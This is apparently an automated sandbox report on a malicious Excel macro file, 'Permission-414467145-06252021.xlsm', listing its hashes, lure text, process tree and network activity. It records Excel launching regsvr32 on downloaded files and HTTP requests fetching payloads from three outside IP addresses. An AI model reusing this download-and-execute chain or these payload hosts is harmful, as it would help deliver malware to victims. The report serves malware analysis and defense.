Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-414467145-06252021.xlsm

Overview

General Information

Sample Name:Permission-414467145-06252021.xlsm
Analysis ID:440505
MD5:590ca0e597487dd5ad6c2f1fb64184dd
SHA1:e141e27af930a2cdeafab2eb20727000de893629
SHA256:20a72dc5350b296f2857911444fa065f5b0bb437be8d1bc61819cf29828a2955
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1980 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3032 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2244 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2492, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 1980

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.240.103.219Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A07B784.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.240.103.219Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.5879460648.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2145275904.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124011430.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2105200473.0000000001CC0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th
Source: Screenshot number: 4Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A r7m r7m ..
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 8Screenshot OCR: Enable Content 30 31 32 33 ) CI O 34 35 36 37 38 , Id 1 p pi Sheetl tj i q |1|| P A Gy m
Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-414467145-06252021.xlsmInitial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Permission-414467145-06252021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC6B8.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-414467145-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-414467145-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-414467145-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 1552Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3040Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3028Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-414467145-06252021.xlsm5%VirustotalBrowse
Permission-414467145-06252021.xlsm4%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://185.183.99.120/44372.5879460648.dat0%Avira URL Cloudsafe
http://190.14.37.3/44372.5879460648.dat0%Avira URL Cloudsafe
http://185.240.103.219/44372.5879460648.dat0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.183.99.120/44372.5879460648.datfalse
  • Avira URL Cloud: safe
unknown
http://190.14.37.3/44372.5879460648.datfalse
  • Avira URL Cloud: safe
unknown
http://185.240.103.219/44372.5879460648.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comregsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/regsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpfalse
              high
              http://www.%s.comPAregsvr32.exe, 00000003.00000002.2145875153.0000000003A70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124555329.0000000003C50000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2149488678.0000000004977000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2128195072.0000000004CB7000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.2149321105.0000000004790000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127918716.0000000004AD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2109605938.0000000004970000.00000002.00000001.sdmpfalse
                high
                http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2145275904.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2124011430.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2105200473.0000000001CC0000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                190.14.37.3
                unknownPanama
                52469OffshoreRacksSAPAfalse
                185.183.99.120
                unknownNetherlands
                60117HSAEfalse
                185.240.103.219
                unknownRussian Federation
                57724DDOS-GUARDRUfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:440505
                Start date:25.06.2021
                Start time:14:06:26
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 58s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Permission-414467145-06252021.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.expl.evad.winXLSM@7/7@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                14:06:49API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DDOS-GUARDRUDecline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                ForceNitro.exeGet hashmaliciousBrowse
                • 185.178.208.135
                PO#8076.exeGet hashmaliciousBrowse
                • 185.129.100.112
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                • 185.129.100.112
                EDS03932,pdf.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                • 185.178.208.160
                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                • 5.253.61.31
                AxR7BY4wzz.exeGet hashmaliciousBrowse
                • 185.178.208.189
                SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                • 185.178.208.189
                #U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htmGet hashmaliciousBrowse
                • 185.129.100.100
                Install.exeGet hashmaliciousBrowse
                • 185.219.40.40
                CHEAT.exeGet hashmaliciousBrowse
                • 185.178.208.161
                seed.exeGet hashmaliciousBrowse
                • 185.219.40.40
                DHL Document. PDF.exeGet hashmaliciousBrowse
                • 5.253.61.133
                wrHgqtMUGL.exeGet hashmaliciousBrowse
                • 45.128.207.237
                OffshoreRacksSAPA4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
